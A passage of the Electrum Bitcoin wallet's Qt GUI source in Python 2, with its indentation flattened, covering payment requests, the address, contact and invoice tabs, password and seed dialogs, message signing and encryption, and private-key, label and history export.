return True
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoices_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.emit(SIGNAL('payment_request_ok'))
else:
self.emit(SIGNAL('payment_request_error'))
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(unicode(URI), self.on_pr)
except BaseException as e:
self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
return
self.tabs.setCurrentIndex(1)
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fee_e]:
e.setText('')
e.setFrozen(False)
self.set_pay_from([])
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.update_fee()
def create_list_tab(self, l):
w = QWidget()
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setMargin(0)
vbox.setSpacing(0)
vbox.addWidget(l)
buttons = QWidget()
vbox.addWidget(buttons)
return w
def create_addresses_tab(self):
l = MyTreeWidget(self, self.create_receive_menu, [ _('Address'), _('Label'), _('Balance'), _('Tx')], 1)
l.setSelectionMode(QAbstractItemView.ExtendedSelection)
l.on_update = self.update_address_tab
self.address_list = l
return self.create_list_tab(l)
def create_contacts_tab(self):
l = MyTreeWidget(self, self.create_contact_menu, [_('Name'), _('Value'), _('Type')], 1, [0, 1])
l.setSelectionMode(QAbstractItemView.ExtendedSelection)
l.setSortingEnabled(True)
l.on_edited = self.on_contact_edited
l.on_permit_edit = self.on_permit_contact_edit
l.on_update = self.update_contacts_tab
self.contacts_list = l
return self.create_list_tab(l)
def update_invoices_list(self):
inv_list = self.invoices.sorted_list()
l = self.invoices_list
l.clear()
for pr in inv_list:
key = pr.get_id()
status = self.invoices.get_status(key)
requestor = pr.get_requestor()
exp = pr.get_expiration_date()
date_str = util.format_time(exp) if exp else _('Never')
item = QTreeWidgetItem([date_str, requestor, pr.memo, self.format_amount(pr.get_amount(), whitespaces=True), pr_tooltips.get(status,'')])
item.setIcon(4, QIcon(pr_icons.get(status)))
item.setData(0, Qt.UserRole, key)
item.setFont(1, QFont(MONOSPACE_FONT))
item.setFont(3, QFont(MONOSPACE_FONT))
l.addTopLevelItem(item)
l.setCurrentItem(l.topLevelItem(0))
self.invoices_list.setVisible(len(inv_list))
self.invoices_label.setVisible(len(inv_list))
def delete_imported_key(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_imported_key(addr)
self.address_list.update()
self.history_list.update()
def edit_account_label(self, k):
text, ok = QInputDialog.getText(self, _('Rename account'), _('Name') + ':', text = self.wallet.labels.get(k,''))
if ok:
label = unicode(text)
self.wallet.set_label(k,label)
self.address_list.update()
def account_set_expanded(self, item, k, b):
item.setExpanded(b)
self.accounts_expanded[k] = b
def create_account_menu(self, position, k, item):
menu = QMenu()
exp = item.isExpanded()
menu.addAction(_("Minimize") if exp else _("Maximize"), lambda: self.account_set_expanded(item, k, not exp))
menu.addAction(_("Rename"), lambda: self.edit_account_label(k))
if self.wallet.seed_version > 4:
menu.addAction(_("View details"), lambda: self.show_account_details(k))
menu.exec_(self.address_list.viewport().mapToGlobal(position))
def create_receive_menu(self, position):
selected = self.address_list.selectedItems()
multi_select = len(selected) > 1
addrs = [unicode(item.text(0)) for item in selected]
if not multi_select:
item = self.address_list.itemAt(position)
if not item:
return
addr = addrs[0]
if not is_valid(addr):
k = str(item.data(0,32).toString())
if k:
self.create_account_menu(position, k, item)
else:
item.setExpanded(not item.isExpanded())
return
menu = QMenu()
if not multi_select:
menu.addAction(_("Copy to clipboard"), lambda: self.app.clipboard().setText(addr))
menu.addAction(_("Request payment"), lambda: self.receive_at(addr))
menu.addAction(_("Edit label"), lambda: self.address_list.editItem(item, self.address_list.editable_columns[0]))
menu.addAction(_('History'), lambda: self.show_address(addr))
menu.addAction(_('Public Keys'), lambda: self.show_public_keys(addr))
if self.wallet.can_export():
menu.addAction(_("Private key"), lambda: self.show_private_key(addr))
if not self.wallet.is_watching_only():
menu.addAction(_("Sign/verify message"), lambda: self.sign_verify_message(addr))
menu.addAction(_("Encrypt/decrypt message"), lambda: self.encrypt_message(addr))
if self.wallet.is_imported(addr):
menu.addAction(_("Remove from wallet"), lambda: self.delete_imported_key(addr))
addr_URL = block_explorer_URL(self.config, 'addr', addr)
if addr_URL:
menu.addAction(_("View on block explorer"), lambda: webbrowser.open(addr_URL))
if any(not self.wallet.is_frozen(addr) for addr in addrs):
menu.addAction(_("Freeze"), lambda: self.set_frozen_state(addrs, True))
if any(self.wallet.is_frozen(addr) for addr in addrs):
menu.addAction(_("Unfreeze"), lambda: self.set_frozen_state(addrs, False))
def can_send(addr):
return not self.wallet.is_frozen(addr) and sum(self.wallet.get_addr_balance(addr)[:2])
if any(can_send(addr) for addr in addrs):
menu.addAction(_("Send From"), lambda: self.send_from_addresses(addrs))
run_hook('receive_menu', menu, addrs, self.wallet)
menu.exec_(self.address_list.viewport().mapToGlobal(position))
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
domain = self.wallet.get_account_addresses(self.current_account)
return self.wallet.get_spendable_coins(domain)
def send_from_addresses(self, addrs):
self.set_pay_from(addrs)
self.tabs.setCurrentIndex(1)
self.update_fee()
def paytomany(self):
self.tabs.setCurrentIndex(1)
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.tabs.setCurrentIndex(1)
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def on_permit_contact_edit(self, item, column):
# openalias items shouldn't be editable
return item.text(2) != "openalias"
def on_contact_edited(self, item, column, prior):
if column == 0: # Remove old contact if renamed
self.contacts.pop(prior)
self.set_contact(unicode(item.text(0)), unicode(item.text(1)))
def set_contact(self, label, address):
if not is_valid(address):
self.show_error(_('Invalid Address'))
self.contacts_list.update() # Displays original unchanged value
return False
self.contacts[label] = ('address', address)
self.contacts_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove %s from your list of contacts?")
% " + ".join(labels)):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contacts_list.update()
self.update_completions()
def create_contact_menu(self, position):
menu = QMenu()
selected = self.contacts_list.selectedItems()
if not selected:
menu.addAction(_("New contact"), lambda: self.new_contact_dialog())
else:
labels = [unicode(item.text(0)) for item in selected]
addrs = [unicode(item.text(1)) for item in selected]
types = [unicode(item.text(2)) for item in selected]
menu.addAction(_("Copy to Clipboard"), lambda:
self.app.clipboard().setText('\n'.join(labels)))
menu.addAction(_("Pay to"), lambda: self.payto_contacts(labels))
menu.addAction(_("Delete"), lambda: self.delete_contacts(labels))
URLs = []
for (addr, _type) in zip(addrs, types):
if _type == 'address':
URLs.append(block_explorer_URL(self.config, 'addr', addr))
if URLs:
menu.addAction(_("View on block explorer"),
lambda: map(webbrowser.open, URLs))
run_hook('create_contact_menu', menu, selected)
menu.exec_(self.contacts_list.viewport().mapToGlobal(position))
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Expires") + ':'), 1, 0)
grid.addWidget(QLabel(format_time(pr.get_expiration_date())), 1, 1)
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
grid.addWidget(QLabel(_("Payment URL") + ':'), 4, 0)
grid.addWidget(QLabel(pr.payment_url), 4, 1)
grid.addWidget(QLabel(_("Outputs") + ':'), 5, 0)
outputs_str = '\n'.join(map(lambda x: x[1] + ' ' + self.format_amount(x[2])+ self.base_unit(), pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 5, 1)
if pr.tx:
grid.addWidget(QLabel(_("Transaction ID") + ':'), 6, 0)
l = QLineEdit(pr.tx)
l.setReadOnly(True)
grid.addWidget(l, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
return
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def invoices_list_menu(self, position):
item = self.invoices_list.itemAt(position)
if not item:
return
key = str(item.data(0, 32).toString())
pr = self.invoices.get(key)
status = self.invoices.get_status(key)
menu = QMenu()
menu.addAction(_("Details"), lambda: self.show_invoice(key))
if status == PR_UNPAID:
menu.addAction(_("Pay Now"), lambda: self.do_pay_invoice(key))
def delete_invoice(key):
self.invoices.remove(key)
self.invoices_list.update()
menu.addAction(_("Delete"), lambda: delete_invoice(key))
menu.exec_(self.invoices_list.viewport().mapToGlobal(position))
def update_address_tab(self):
l = self.address_list
item = l.currentItem()
current_address = item.data(0, Qt.UserRole).toString() if item else None
l.clear()
accounts = self.wallet.get_accounts()
if self.current_account is None:
account_items = sorted(accounts.items())
else:
account_items = [(self.current_account, accounts.get(self.current_account))]
for k, account in account_items:
if len(accounts) > 1:
name = self.wallet.get_account_name(k)
c, u, x = self.wallet.get_account_balance(k)
account_item = QTreeWidgetItem([ name, '', self.format_amount(c + u + x), ''])
account_item.setExpanded(self.accounts_expanded.get(k, True))
account_item.setData(0, Qt.UserRole, k)
l.addTopLevelItem(account_item)
else:
account_item = l
sequences = [0,1] if account.has_change() else [0]
for is_change in sequences:
if len(sequences) > 1:
name = _("Receiving") if not is_change else _("Change")
seq_item = QTreeWidgetItem( [ name, '', '', '', ''] )
account_item.addChild(seq_item)
if not is_change:
seq_item.setExpanded(True)
else:
seq_item = account_item
used_item = QTreeWidgetItem( [ _("Used"), '', '', '', ''] )
used_flag = False
addr_list = account.get_addresses(is_change)
for address in addr_list:
num = len(self.wallet.history.get(address,[]))
is_used = self.wallet.is_used(address)
label = self.wallet.labels.get(address,'')
c, u, x = self.wallet.get_addr_balance(address)
balance = self.format_amount(c + u + x)
item = QTreeWidgetItem([address, label, balance, "%d"%num])
item.setFont(0, QFont(MONOSPACE_FONT))
item.setData(0, Qt.UserRole, address)
item.setData(0, Qt.UserRole+1, True) # label can be edited
if self.wallet.is_frozen(address):
item.setBackgroundColor(0, QColor('lightblue'))
if self.wallet.is_beyond_limit(address, account, is_change):
item.setBackgroundColor(0, QColor('red'))
if is_used:
if not used_flag:
seq_item.insertChild(0, used_item)
used_flag = True
used_item.addChild(item)
else:
seq_item.addChild(item)
if address == current_address:
l.setCurrentItem(item)
def update_contacts_tab(self):
l = self.contacts_list
item = l.currentItem()
current_key = item.data(0, Qt.UserRole).toString() if item else None
l.clear()
for key in sorted(self.contacts.keys()):
_type, value = self.contacts[key]
item = QTreeWidgetItem([key, value, _type])
item.setData(0, Qt.UserRole, key)
l.addTopLevelItem(item)
if key == current_key:
l.setCurrentItem(item)
run_hook('update_contacts_tab', l)
def create_console_tab(self):
from console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: apply( f, (method, args, self.password_dialog ))
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def change_account(self,s):
if s == _("All accounts"):
self.current_account = None
else:
accounts = self.wallet.get_account_names()
for k, v in accounts.items():
if v == s:
self.current_account = k
self.history_list.update()
self.update_status()
self.address_list.update()
self.receive_list.update()
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self.account_selector = QComboBox()
self.account_selector.setSizeAdjustPolicy(QComboBox.AdjustToContents)
self.connect(self.account_selector, SIGNAL("activated(QString)"), self.change_account)
sb.addPermanentWidget(self.account_selector)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), self.run_network_dialog )
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.use_encryption else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.set_send_button_text()
def change_password_dialog(self):
from password_dialog import PasswordDialog, PW_CHANGE
msg = (_('Your wallet is encrypted. Use this dialog to change your '
'password. To disable wallet encryption, enter an empty new '
'password.') if self.wallet.use_encryption
else _('Your wallet keys are not encrypted'))
d = PasswordDialog(self, self.wallet, msg, PW_CHANGE)
ok, password, new_password = d.run()
if not ok:
return
try:
self.wallet.check_password(password)
except BaseException as e:
self.show_error(str(e))
return
try:
self.wallet.update_password(password, new_password)
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
if new_password:
msg = _('Password was updated successfully')
else:
msg = _('This wallet is not encrypted')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
i = self.tabs.currentIndex()
if i == 0:
self.history_list.filter(t, [2, 3, 4]) # Date, Description, Amount
elif i == 1:
self.invoices_list.filter(t, [0, 1, 2, 3]) # Date, Requestor, Description, Amount
elif i == 2:
self.receive_list.filter(t, [0, 1, 2, 3, 4]) # Date, Account, Address, Description, Amount
elif i == 3:
self.address_list.filter(t, [0,1, 2]) # Address, Label, Balance
elif i == 4:
self.contacts_list.filter(t, [0, 1]) # Key, Value
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
if self.set_contact(unicode(line2.text()), str(line1.text())):
self.tabs.setCurrentIndex(4)
def update_new_account_menu(self):
self.new_account_menu.setVisible(self.wallet.can_create_accounts())
self.new_account_menu.setEnabled(self.wallet.permit_account_naming())
self.update_account_selector()
def new_account_dialog(self):
dialog = WindowModalDialog(self, _("New Account Name"))
vbox = QVBoxLayout()
msg = _("Enter a name to give the account. You will not be "
"permitted to create further accounts until the new account "
"receives at least one transaction.") + "\n"
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
e = QLineEdit()
vbox.addWidget(e)
vbox.addLayout(Buttons(CancelButton(dialog), OkButton(dialog)))
dialog.setLayout(vbox)
if dialog.exec_():
self.wallet.set_label(self.wallet.last_account_id(), str(e.text()))
self.address_list.update()
self.tabs.setCurrentIndex(3)
self.update_new_account_menu()
def check_next_account(self):
if self.wallet.needs_next_account() and not self.checking_accounts:
self.checking_accounts = True
msg = _("All the accounts in your wallet have received "
"transactions. Electrum must check whether more "
"accounts exist; one will only be shown if "
"it has been used or you give it a name.")
self.show_message(msg, title=_("Check Accounts"))
self.create_next_account()
@protected
def create_next_account(self, password):
def on_done():
self.checking_accounts = False
self.update_new_account_menu()
task = partial(self.wallet.create_next_account, password)
self.wallet.thread.add(task, on_done=on_done)
def show_master_public_keys(self):
dialog = WindowModalDialog(self, "Master Public Keys")
mpk_dict = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(100)
mpk_text.addCopyButton(self.app)
sorted_keys = sorted(mpk_dict.keys())
def show_mpk(index):
mpk_text.setText(mpk_dict[sorted_keys[index]])
# only show the combobox in case multiple accounts are available
if len(mpk_dict) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
is_mine = self.wallet.master_private_keys.has_key(key)
mine_text = [_("cosigner"), _("self")]
return "%s (%s)" % (key, mine_text[is_mine])
return key
labels = list(map(label, sorted_keys))
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels,
on_click)
vbox.addLayout(labels_clayout.layout())
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
@protected
def show_seed_dialog(self, password):
if self.wallet.use_encryption and password is None:
return # User cancelled password input
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
try:
mnemonic = self.wallet.get_mnemonic(password)
except BaseException as e:
self.show_error(str(e))
return
from seed_dialog import SeedDialog
d = SeedDialog(self, mnemonic, self.wallet.has_imported_keys())
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
def show_public_keys(self, address):
if not address: return
try:
pubkey_list = self.wallet.get_public_keys(address)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
d = WindowModalDialog(self, _("Public key"))
d.setMinimumSize(600, 200)
vbox = QVBoxLayout()
vbox.addWidget( QLabel(_("Address") + ': ' + address))
if isinstance(self.wallet, BIP32_RD_Wallet):
derivation = self.wallet.address_id(address)
vbox.addWidget(QLabel(_("Derivation") + ': ' + derivation))
vbox.addWidget(QLabel(_("Public key") + ':'))
keys_e = ShowQRTextEdit(text='\n'.join(pubkey_list))
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address: return
try:
pk_list = self.wallet.get_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 200)
vbox = QVBoxLayout()
vbox.addWidget( QLabel(_("Address") + ': ' + address))
vbox.addWidget( QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text='\n'.join(pk_list))
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
@protected
def do_sign(self, address, message, signature, password):
message = unicode(message.toPlainText()).encode('utf-8')
task = partial(self.wallet.sign_message, str(address.text()),
message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
message = unicode(message.toPlainText())
message = message.encode('utf-8')
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address.text(), sig, message)
except:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(410, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
cyphertext = str(encrypted_e.toPlainText())
task = partial(self.wallet.decrypt_message, str(pubkey_e.text()),
cyphertext, password)
self.wallet.thread.add(task, on_success=message_e.setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = unicode(message_e.toPlainText())
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, str(pubkey_e.text()))
encrypted_e.setText(encrypted)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address = ''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_keys(address)[0]
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
parent = parent or self
d = WindowModalDialog(parent, _("Enter Password"))
pw = QLineEdit()
pw.setEchoMode(2)
vbox = QVBoxLayout()
if not msg:
msg = _('Please enter your password')
vbox.addWidget(QLabel(msg))
grid = QGridLayout()
grid.setSpacing(8)
grid.addWidget(QLabel(_('Password')), 1, 0)
grid.addWidget(pw, 1, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
d.setLayout(vbox)
run_hook('password_dialog', pw, grid, 1)
if not d.exec_(): return
return unicode(pw.text())
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str, Transaction
try:
tx = tx_from_str(txt)
return Transaction(tx)
except:
traceback.print_exc(file=sys.stdout)
self.show_critical(_("Electrum was unable to parse your transaction"))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_qr(self.config)
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
# transactions are binary, but qrcode seems to return utf8...
data = data.decode('utf8')
z = bitcoin.base_decode(data, length=None, base=43)
data = ''.join(chr(ord(b)) for b in z).encode('hex')
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
try:
self.wallet.check_password(password)
except Exception as e:
self.show_error(str(e))
return
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.addresses(True)
done = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done:
break
private_keys[addr] = "\n".join(self.wallet.get_private_key(addr, password))
d.emit(SIGNAL('computing_privkeys'))
d.emit(SIGNAL('show_privkeys'))
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
d.connect(d, QtCore.SIGNAL('computing_privkeys'), lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
d.connect(d, QtCore.SIGNAL('show_privkeys'), show_privkeys)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
f = open(labelsFile, 'r')
data = f.read()
f.close()
for key, value in json.loads(data).items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to import your labels.") + "\n" + str(reason))
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electrum_labels.json', "*.json")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels where exported to") + " '%s'" % str(fileName))
except (IOError, os.error), reason:
self.show_critical(_("Electrum was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electrum-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error), reason:
export_error_label = _("Electrum was unable to produce a transaction export.")
